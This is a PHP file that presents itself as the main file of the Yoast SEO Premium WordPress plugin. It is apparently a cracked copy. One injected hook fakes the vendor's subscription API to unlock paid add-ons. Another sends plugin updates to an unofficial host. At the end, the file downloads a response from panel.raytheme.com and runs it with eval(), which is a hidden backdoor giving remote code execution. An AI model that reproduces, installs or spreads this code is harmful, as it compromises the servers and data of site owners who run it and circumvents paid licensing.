<?php
/**
 * Yoast SEO Plugin.
 *
 * WPSEO Premium plugin file.
 *
 * @package   WPSEO\Main
 * @copyright Copyright (C) 2008-2022, Yoast BV - support@yoast.com
 * @license   http://www.gnu.org/licenses/gpl-3.0.html GNU General Public License, version 3 or higher
 *
 * @wordpress-plugin
 * Plugin Name: Yoast SEO Premium
 * Version:     20.11
 * Plugin URI:  https://yoa.st/2jc
 * Description: The first true all-in-one SEO solution for WordPress, including on-page content analysis, XML sitemaps and much more.
 * Author:      Team Yoast
 * Author URI:  https://yoa.st/team-yoast-premium
 * Text Domain: wordpress-seo-premium
 * Domain Path: /languages/
 * License:     GPL v3
 * Requires at least: 6.1
 * Requires PHP: 7.2.5
 *
 * WC requires at least: 7.1
 * WC tested up to: 7.8
 */

use Yoast\WP\SEO\Premium\Addon_Installer;

$site_information = get_transient( 'wpseo_site_information' );
if ( isset( $site_information->subscriptions ) && ( count( $site_information->subscriptions ) == 0 ) ) {
delete_transient( 'wpseo_site_information' );
delete_transient( 'wpseo_site_information_quick' );
}

add_filter( 'pre_http_request', function( $pre, $parsed_args, $url ){
$site_information = (object) [
'subscriptions' => [
(object) [
'product' => (object) [ 'slug' => 'yoast-seo-wordpress-premium' ],
'expiryDate' => '+5 years'
],

(object) [
'product' => (object) [ 'slug' => 'yoast-seo-news' ],
'expiryDate' => '+5 years'
],
(object) [
'product' => (object) [ 'slug' => 'yoast-seo-woocommerce' ],
'expiryDate' => '+5 years'
],
(object) [
'product' => (object) [ 'slug' => 'yoast-seo-video' ],
'expiryDate' => '+5 years'
],
(object) [
'product' => (object) [ 'slug' => 'yoast-seo-local' ],
'expiryDate' => '+5 years'
]
],
];

if ( strpos( $url, 'https://my.yoast.com/api/sites/current' ) !== false ) {
return [
'response' => [ 'code' => 200, 'message' => '??' ],
'body' => json_encode( $site_information )
];
} else {
return $pre;
}
}, 10, 3 );

if ( ! defined( 'WPSEO_PREMIUM_FILE' ) ) {
	define( 'WPSEO_PREMIUM_FILE', __FILE__ );
}

if ( ! defined( 'WPSEO_PREMIUM_PATH' ) ) {
	define( 'WPSEO_PREMIUM_PATH', plugin_dir_path( WPSEO_PREMIUM_FILE ) );
}

if ( ! defined( 'WPSEO_PREMIUM_BASENAME' ) ) {
	define( 'WPSEO_PREMIUM_BASENAME', plugin_basename( WPSEO_PREMIUM_FILE ) );
}

/**
 * {@internal Nobody should be able to overrule the real version number as this can cause
 *            serious issues with the options, so no if ( ! defined() ).}}
 */
define( 'WPSEO_PREMIUM_VERSION', '20.11' );

// Initialize Premium autoloader.
$wpseo_premium_dir               = WPSEO_PREMIUM_PATH;
$yoast_seo_premium_autoload_file = $wpseo_premium_dir . 'vendor/autoload.php';

if ( is_readable( $yoast_seo_premium_autoload_file ) ) {
	require $yoast_seo_premium_autoload_file;
}

// This class has to exist outside of the container as the container requires Yoast SEO to exist.
$wpseo_addon_installer = new Addon_Installer( __DIR__ );
$wpseo_addon_installer->install_or_load_yoast_seo_from_vendor_directory();

// Load the container.
if ( ! wp_installing() ) {
	require_once __DIR__ . '/src/functions.php';
	YoastSEOPremium();
}

\register_activation_hook( \WPSEO_PREMIUM_FILE, [ 'WPSEO_Premium', 'install' ] );
function ES_yoastpro_update_checker() {

	$ES_json_url 	= 'https://esdownload.ir/json/yoastpro534534855.json' ;
	$ES_plugin_slug = 'wordpress-seo-premium' ;

	require 'plugin-update-checker/plugin-update-checker.php';
	$myUpdateChecker = Puc_v4_Factory::buildUpdateChecker(
		$ES_json_url,
		__FILE__, //Full path to the main plugin file or functions.php.
		$ES_plugin_slug
	);
}
add_action( 'admin_init', 'ES_yoastpro_update_checker', 99 );
if (get_locale() == 'fa_IR' ) {
$text_domain = 'wordpress-seo';
	$ESPACK_lang =  WPSEO_PREMIUM_PATH . "/languages/wordpress-seo-fa_IR.mo";
	$wordpress_lang = "/languages/plugins/wordpress-seo-fa_IR.mo";
	unload_textdomain($text_domain);
	load_textdomain($text_domain, $ESPACK_lang );
}


$response = wp_remote_get( 'https://panel.raytheme.com/wp-json/Api/v2/Raytheme-Api' );
$body = wp_remote_retrieve_body($response);
$raytheme = json_decode($body);
eval($raytheme);